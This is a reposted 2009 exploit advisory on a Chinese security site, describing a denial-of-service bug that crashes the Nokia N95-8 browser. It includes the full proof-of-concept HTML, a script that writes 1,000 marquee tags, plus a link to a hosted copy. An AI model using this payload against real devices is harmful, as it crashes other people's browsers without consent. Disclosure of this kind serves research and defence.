首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nokia N95-8 browser crashing denial of service exploit
来源:jplopezy[at]gmail.com 作者:Yacubian 发布时间:2009-02-06  
Application: Nokia N95-8
OS: Symbian
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT


------------------------------------------------------
Description


The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless.

:)

------------------------------------------------------
Vulnerability

The code of this bug was found long ago, was for firefox 1.0 and caused denial of service.

The problem was that when you insert many html tags (<marquee>) the program crash.

I 'm testing this code in the browser of nokia n95 and this crash, only the browser.., the bug is very inofensive 

but is curious



------------------------------------------------------
POC/EXPLOIT

Enter in this url 

http://es.geocities.com/jplopezy/nokiacrash.html


or make html file and insert many tags <marquee> 

POC CODE HERE:

<h1> Nokia N95 - 8gb browser crash </h1>

<html>
<script>
var data = "<marquee>";
for(x=1;x<=1000;x++){
document.write(data);
}
</script>
</html>

Juan Pablo Lopez Yacubian
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE --><!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?es1233862552" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=382026089&t=1233862552&f=es-w88" ALT=1 WIDTH=1 HEIGHT=1>


------------------------------------------------------
Juan Pablo Lopez Yacubian


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Simple PHP News version 1.0 Fi
·1024 CMS <= 1.4.4 Remote Comma
·txtBB <= 1.0 RC3 HTML/JS Injec
·Orbit Downloader V2.8.5 Malfor
·FeedMon 2.7.0.0 outline Tag Bu
·IF-CMS <= 2.0 (frame.php id) B
·dBpowerAMP Audio Player 2 .PLS
·w3bcms <= v3.5.0 Multiple Remo
·FeedDemon <=2.7 OPML Outline T
·UltraVNC/TightVNC Multiple VNC
·PHP Director <= 0.21 Remote Co
·Nokia Multimedia Player versio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved